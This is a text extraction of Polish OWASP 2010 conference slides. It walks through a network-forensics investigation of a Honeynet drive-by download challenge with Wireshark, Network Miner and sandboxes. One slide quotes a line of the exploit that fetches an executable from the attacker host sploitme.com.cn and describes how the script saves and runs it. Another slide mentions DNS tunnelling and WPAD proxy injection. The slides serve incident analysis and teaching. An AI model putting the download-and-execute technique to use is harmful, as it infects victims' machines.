OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania...
Transcript of OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania...
![Page 1: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/1.jpg)
Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Network ForensicCo mówią złapane pakiety?
Paweł Goleń[email protected]
2010-06-10
![Page 2: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/2.jpg)
2OWASP
Zamiast agendy
Kontynuacja tematów z poprzedniego spotkaniaBędziemy badać malware, atak drive-by downloadSpojrzenie z perspektywy ruchu sieciowegoPodobna technika dla innych incydentów
Network Forensic – dlaczego na OWASP?Nie ma oprogramowania idealnegoIncydenty należy zbadać, zwłaszcza te (nie)udane
Im więcej źródeł informacji, tym lepiej– Ruch sieciowy zawiera WSZYSTKIE informacje
Dobrze wiedzieć jak TO działa Aplikacja HTTP TCP IP Ethernet → → → → W przypadku zainteresowania tematem bezpieczeństwa
![Page 3: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/3.jpg)
3OWASP
The 20 Coolest Jobs in Information Security
![Page 4: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/4.jpg)
4OWASP
Co będziemy robić
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 5: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/5.jpg)
5OWASP
Gość specjalny: Przykładowy incydent
Źródło: Honeynet Project ChallengesForensic Challenge 2010 - browsers under attack
Kilka założeń na początekNie rozwiązujemy zadania (odpowiedzi na pytania)Staramy się określić co się stało, kto i jak atakowałZakładamy, że nie wiemy (prawie) NIC
Prezentacja to tylko przykładMożna spróbować innego podejściaMożna skorzystać z innych (lepszych?) narzędzi
Narzędzie nie zniweluje braku wiedzy!
![Page 6: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/6.jpg)
6OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 7: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/7.jpg)
7OWASP
Krok 1: Statystyka
![Page 8: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/8.jpg)
8OWASP
Krok 2: Endpoints
![Page 9: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/9.jpg)
9OWASP
Krok 3: Conversations - TCP
![Page 10: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/10.jpg)
10OWASP
Krok 3: Conversations - UDP
![Page 11: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/11.jpg)
11OWASP
Czego się dowiedzieliśmy
Główna aktywność na porcie 80 (HTTP?)Warto też rzucić okiem na:
DNS (wykorzystywany jako C&C) Wykorzystanie tunelowania
– Po/w protokole DNS– Po prostu po porcie 53
Doskonała metoda na płatne hotspoty
DHCP (Rouge DHCP Servers) Podmiana serwerów DNS (DNSChanger) „Wstrzyknięcie” wrogiego serwera proxy (mój pomysł :P)
– WPAD, DHCP opcja 252
Wszelkie odchylenia od „normy”
![Page 12: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/12.jpg)
12OWASP
Jakie sieci?
10.0.2/24, 10.0.3/24, 10.0.4/24, 10.0.5/2410.0.x.2, 10.0.x.15 – na podstawie DHCP
192.168.1.1 – serwer DNS192.168.56/24 - ???
192.168.56.50, 192.168.56.51, 192.168.56.52209.85.128.0/17 - GOGL
209.85.227.99, 209.85.227.100, 209.85.227.10664.236.114.1 - www.honeynet.org74.125.0/16 - GOGL
74.125.77.101, 74.125.77.102
![Page 13: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/13.jpg)
13OWASP
Czy możemy coś wykluczyć?
Niektóre adresy są „bardziej ryzykowne”Domeny typu *.cn, *.ruSieci należące do „egzotycznych” krajówAdresy „przypominające” inne (phishing?)
Inne adresy/sieci są bardziej zaufaneZaufane, ale nie znaczy „pewne”
Może zostać osadzony „wrogi skrypt” SQLi XSS
Nie można zakładać, że „znana” strona nie zaraża
![Page 14: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/14.jpg)
14OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 15: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/15.jpg)
15OWASP
Gdzie są klienci?
Klienci == ofiaryW zasadzie to już wiemy (Conversations - TCP)
Spróbujmy znaleźć ich przez DHCPPrzy okazji można się coś o nich dowiedzieć
![Page 16: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/16.jpg)
16OWASP
Gdzie są klienci – inny sposób
Klienci łączą się z serweremWystarczy znaleźć źródła połączeń na port 80
Pierwszy element 3-way handshake SYN -> SYN/ACK -> ACK
Wireshark i display filter: tcp.flags == 0x2 and tcp.dstport == 80 (tcp.flags == 0x2 or tcp.flags == 0x12) and tcp.port == 80 http.request <- jeszcze inny sposób
Lista klientów: 10.0.2.15, 10.0.3.15, 10.0.4.15, 10.0.5.15
![Page 17: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/17.jpg)
17OWASP
Ciekawostka – kiedy klienci byli aktywni
![Page 18: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/18.jpg)
18OWASP
Gdzie są serwery
http://xkcd.com/742/
![Page 19: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/19.jpg)
19OWASP
Zagadka – czego brakuje na tym obrazku?
![Page 20: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/20.jpg)
20OWASP
Gdzie są zapytania DNS?
Brak zapytań DNS o adresy (też jest śladem!)rapidshare.com.eyu32.rushop.honeynet.sgsploitme.com.cn
Prawdopodobnie zmodyfikowany plik HostsKto i dlaczego dokonał modyfikacji
Tu prawdopodobnie na potrzeby przykładu→ Malware często modyfikuje plik Host
– Blokowanie dostępu» Samoobrona aktualizacje, narzędzia, konkurencja→
– Ale nie tylko w tym celu...
![Page 21: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/21.jpg)
21OWASP
PWS-Banker.y!hosts
![Page 22: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/22.jpg)
22OWASP
Co już wiemy
Klienci10.0.2.15, 10.0.3.15, 10.0.4.15, 10.0.5.15
„Dziwne” serwery, brak zapytań DNSrapidshare.com.eyu32.rushop.honeynet.sgsploitme.com.cn
„Bezpieczne” serweryPozostałe (Google, Honeynet)
Przynajmniej na potrzeby prezentacji
![Page 23: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/23.jpg)
23OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 24: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/24.jpg)
24OWASP
Ciekawostka: Wizualizacje
Netgrokhttp://www.cs.umd.edu/projects/netgrok/
WizualizacjePełnego zrzutu ruchuAktywności poszczególnych klientów (ofiar)Informację o sieciach trzeba podać
Czy to się do czegoś przydajeNa slajdach wygląda niezbyt ciekawieTrochę lepiej sprawdza się na komputerze
Identyfikacja „głośnych” węzłów w sieci
![Page 25: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/25.jpg)
25OWASP
Wizualizacja 1 - całość
![Page 26: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/26.jpg)
26OWASP
Wizualizacja 2 - 10.0.2.15
![Page 27: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/27.jpg)
27OWASP
Wizualizacja 3 - 10.0.3.15
![Page 28: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/28.jpg)
28OWASP
Wizualizacja 4 - 10.0.4.15
![Page 29: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/29.jpg)
29OWASP
Wizualizacja 5 - 10.0.5.15
![Page 30: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/30.jpg)
30OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 31: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/31.jpg)
31OWASP
Jak klient trafia na stronę
![Page 32: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/32.jpg)
32OWASP
A jak trafia na sploitme.com.cn
Po nagłówku Referer można ustalić gdzie następuje przekierowanieTam należy szukać osadzonego „wrogiego” skryptu
![Page 33: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/33.jpg)
33OWASP
I co się dzieje na sploitme.com.cn?
![Page 34: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/34.jpg)
34OWASP
I kolejna wizualizacja
Jak wygląda sekwencja zdarzeńZbudowanie drzewa odwołań
Na podstawie żądań klienta W oparciu o nagłówek Referer
Do wizualizacji posłuży Tshark Python Graphiz
A rezultat(y) wyglądają mniej więcej tak
![Page 35: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/35.jpg)
35OWASP
Wizualizacja dla 10.0.2.15
![Page 36: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/36.jpg)
36OWASP
Wizualizacja dla 10.0.3.15 (fragment)
![Page 37: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/37.jpg)
37OWASP
Kolejne podsumowanie zebranych informacji
Jak klient trafia na stronęWpisanie adresu URL w paskuKliknięcie w mailu (phishing)
Gdzie ukryty jest „wrogi” kodDocelowe przekierowanie na sploitme.com.cnA przekierowuje z
rapidshare.com.eyu32.ru shop.honeynet.sg
![Page 38: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/38.jpg)
38OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 39: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/39.jpg)
39OWASP
Przydatne narzędzie: Network Miner
Network Miner - Network Forensic Analysis Toolhttp://networkminer.sourceforge.net/Niestety(?) – aplikacja dla Windows
W tym przypadku wykorzystany do:Odzyskiwania plików z HTTPMożna również uzyskać informacje o hostach
System operacyjny, nawiązywane sesje Odpytywane nazwy DNS, WINS,
Można uzyskać w inny sposób (Wireshark) Z Network Miner bywa wygodniej :)
![Page 40: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/40.jpg)
40OWASP
Przykład: Informacje o 10.0.2.15
![Page 41: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/41.jpg)
41OWASP
Przykład: Informacje o sploitme.com.cn
![Page 42: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/42.jpg)
42OWASP
Przykład: Odzyskiwanie plików
![Page 43: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/43.jpg)
43OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 44: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/44.jpg)
44OWASP
Sekwencja zdarzeń dla 10.0.3.15
![Page 45: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/45.jpg)
45OWASP
![Page 46: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/46.jpg)
46OWASP
Co jest w rapidshare(...)/login.php
![Page 47: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/47.jpg)
47OWASP
„Klasyczny” drive-by download
Na „niewinnej” stronie osadzony skryptSkrypt obfuskowany
Można odkodować, np.: Malzilla– http://malzilla.sourceforge.net/
Nie zawsze tak łatwo– Przykłady z poprzednich prezentacji na OWASP
Ostatecznie: ukryty iframePrzekierowanie na „atakującą” stronę
Tu próba wykorzystania podatności w przeglądarce Często payload „dziwnie” przypomina moduły Metasploit Payload może być uzależniony od przeglądarki
![Page 48: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/48.jpg)
48OWASP
Jak atakowana jest przeglądarka (show.php)
Prawie jak w Metasploit
![Page 49: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/49.jpg)
49OWASP
Jaki jest cel exploita na stronie?
Pobranie pliku wykonywalnegoPobranie za pomocą XMLHttpRequest
var urltofile='http://sploitme.com.cn/fg/load.php?e=1
Zapisanie na dysku za pomocą ADODB.StreamUruchomienie go
Uruchomienie przez WScript.Shell
![Page 50: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/50.jpg)
50OWASP
Ciekawostka: atak personalizowany?
![Page 51: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/51.jpg)
51OWASP
Co robi video.exe
Co robi pobrany program?
![Page 52: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/52.jpg)
52OWASP
Przykładowe piaskownice
CWSandboxhttp://mwanalysis.org/http://www.sunbeltsecurity.com/sandbox/
Anubishttp://anubis.iseclab.org/
ThreatExperthttp://www.threatexpert.com/submit.aspx
Norman Sandboxhttp://www.norman.com/technology/norman_sandbox/
![Page 53: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/53.jpg)
53OWASP
I ciekawostka z piaskownicy
![Page 54: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/54.jpg)
54OWASP
Gdzie jesteśmy
Ogólne zapoznanie się z sytuacjąIdentyfikacja klientów i serwerówWizualizacje ruchu w trakcie incydentuIdentyfikacja elementów atakuOdzyskiwanie plików z ruchu sieciowegoWybrane fragmenty z bliskaOgólne spojrzenie na każdy z przypadków
![Page 55: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/55.jpg)
55OWASP
Klient 10.0.2.15
![Page 56: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/56.jpg)
56OWASP
Klient 10.0.3.15
![Page 57: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/57.jpg)
57OWASP
Klient 10.0.4.15
![Page 58: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/58.jpg)
58OWASP
Klient 10.0.5.15
![Page 59: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/59.jpg)
59OWASP
Nagłówek User-Agent można sfałszować
![Page 60: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/60.jpg)
60OWASP
Podsumowanie na koniec
Co udało się ustalićZidentyfikować klientów i serwery,Określić „atakującą” stronęOkreślić jak klienci trafiają na „atakującą” stronęOdzyskać pliki z ruchu sieciowego
Pliki HTML wraz ze skryptami wykorzystanymi w ataku Plik wykonywalny pobierany na atakowaną stację
Określić akcje wykonywane przez pobierany plikOdtworzyć prawdopodobny scenariusz zdarzeń
Co robi użytkownik, co dzieje się samo
Zauważyć fałszowany nagłówek User-Agent
![Page 61: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/61.jpg)
61OWASP
Narzędzia
Wiresharkhttp://www.wireshark.org/
Network Miner, xplicohttp://networkminer.sourceforge.net/http://www.xplico.org/
